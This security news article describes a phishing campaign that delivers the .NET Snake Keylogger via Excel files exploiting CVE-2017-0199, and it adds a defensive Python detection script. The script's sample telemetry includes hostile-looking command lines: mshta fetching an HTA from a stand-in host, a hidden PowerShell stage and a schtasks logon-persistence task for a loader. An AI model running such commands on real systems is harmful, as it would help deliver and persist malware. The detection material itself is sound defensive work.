Researchers recently discovered a multi-stage phishing campaign that delivers a .NET-based variant of the Snake Keylogger. The attack, which uses weaponized Excel documents to compromise Windows systems, poses a significant threat to the confidentiality of user data. Recipients are deceived by phishing emails that prompt them to open an attached Excel file named “swift copy.xls.”
Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is a malicious software that was initially distributed on hacker forums as a subscription-based service. This .NET-based malware is designed to steal sensitive data, including saved credentials from web browsers, clipboard content, and basic device information. Additionally, it can log keystrokes and capture screenshots, making it a powerful tool for cybercriminals.
Fortinet’s FortiGuard Labs reported that the attack starts with a phishing email claiming that funds have been transferred into the recipient’s account. The email tricks recipients into opening the attached Excel file, which contains a specially crafted embedded link object that exploits the CVE-2017-0199 vulnerability to download additional malicious files. Through this covert process the malware retrieves an HTML Application (HTA) file, which is executed by the Microsoft HTML Application host (mshta.exe).
Once decoded, the HTA file reveals obfuscated JavaScript code that in turn contains VBScript and PowerShell scripts. These scripts are responsible for downloading and executing the Snake Keylogger’s Loader module. The downloaded executable, the Loader module, is built on the Microsoft .NET Framework and uses multi-layer protection techniques, such as code transformation and encryption, to evade detection by security products.
The Loader module extracts and decrypts several components from its resource section that are required to deploy the core Snake Keylogger module. The Deploy module, extracted by the Loader, establishes persistence on the victim’s system by marking the Loader module file as hidden and read-only, creating a scheduled task in the Windows Task Scheduler that launches it at startup, and using process hollowing to conceal the malicious code inside a legitimate process.
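The infection chain described in the three paragraphs above (Excel document launching mshta.exe, the HTA stage spawning a script host, and a logon/startup task pointing at a file under the user profile) can be expressed as a few process-lineage detection rules. The script below is an added illustration written for this article and is not FortiGuard Labs’ code or any vendor’s detection content. It runs over constructed process-creation records that mimic Sysmon Event ID 1 fields (image, parent image, command line); the paths, PIDs, task name and the `example.invalid` URL are invented sample data, not indicators from the report.

```python
import re
from dataclasses import dataclass

# Office applications that should not be launching script hosts on their own.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Script interpreters an HTA stage typically hands off to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# User-writable locations where a dropped loader is likely to live.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|users\\public|programdata)\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Simplified process-creation record (field names follow Sysmon Event ID 1)."""
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (pid, rule_id) pairs for events matching the Snake Keylogger chain."""
    findings = []
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        cl = e.command_line.lower()

        # Stage 1: OLE link object in the Excel file pulls an HTA, run by mshta.exe.
        if parent in OFFICE_APPS and img == "mshta.exe":
            findings.append((e.pid, "office-spawns-mshta"))

        # Stage 2: the HTA's embedded VBScript/PowerShell runs the loader download.
        if parent == "mshta.exe" and img in SCRIPT_HOSTS:
            findings.append((e.pid, "mshta-spawns-script-host"))

        # Stage 3: persistence via a logon/startup task whose action lives in a
        # user-writable directory (the Deploy module's scheduled-task persistence).
        if img == "schtasks.exe" and "/create" in cl \
                and ("/sc onlogon" in cl or "/sc onstart" in cl) \
                and USER_WRITABLE.search(e.command_line):
            findings.append((e.pid, "logon-task-from-user-writable-path"))
    return findings


# Constructed sample telemetry: one benign Excel launch, the three malicious
# stages, and a benign scheduled task created from a protected path.
SAMPLE_EVENTS = [
    ProcessEvent(4120, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\explorer.exe",
                 r'"EXCEL.EXE" "C:\Users\alice\Downloads\swift copy.xls"'),
    ProcessEvent(4388, r"C:\Windows\System32\mshta.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"mshta.exe http://example.invalid/page.hta"),
    ProcessEvent(4402, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\mshta.exe",
                 r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\alice\AppData\Local\Temp\stage.ps1"),
    ProcessEvent(4510, r"C:\Windows\System32\schtasks.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'schtasks.exe /create /sc onlogon /tn "Updater" /tr "C:\Users\alice\AppData\Roaming\loader.exe" /f'),
    ProcessEvent(5001, r"C:\Windows\System32\schtasks.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r'schtasks.exe /create /sc onlogon /tn Backup /tr "C:\Program Files\Backup\agent.exe"'),
]


def demo():
    """Run the rules over the constructed sample and return the findings."""
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, rule in demo():
        print(f"pid {pid}: {rule}")
```

Each rule on its own would be noisy in a large estate (administrators do create logon tasks, and mshta.exe has legitimate uses), but the three firing in sequence on one host within minutes is a strong signal that matches the chain described above; correlating them by parent PID or time window is the natural next step.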
The Snake Keylogger attack underscores the evolving tactics of cybercriminals and the importance of robust cybersecurity measures. Users and organizations must remain vigilant by using updated antivirus software and being cautious with email attachments. Education and awareness are key in preventing sophisticated attacks from compromising sensitive data.
By understanding the mechanics of the attack and implementing proactive security measures, individuals and organizations can better protect themselves against this and similar cyber threats. The .NET-based Snake Keylogger attack via weaponized Excel documents represents a significant threat to Windows users, and it is crucial to stay informed and prepared to defend against such attacks.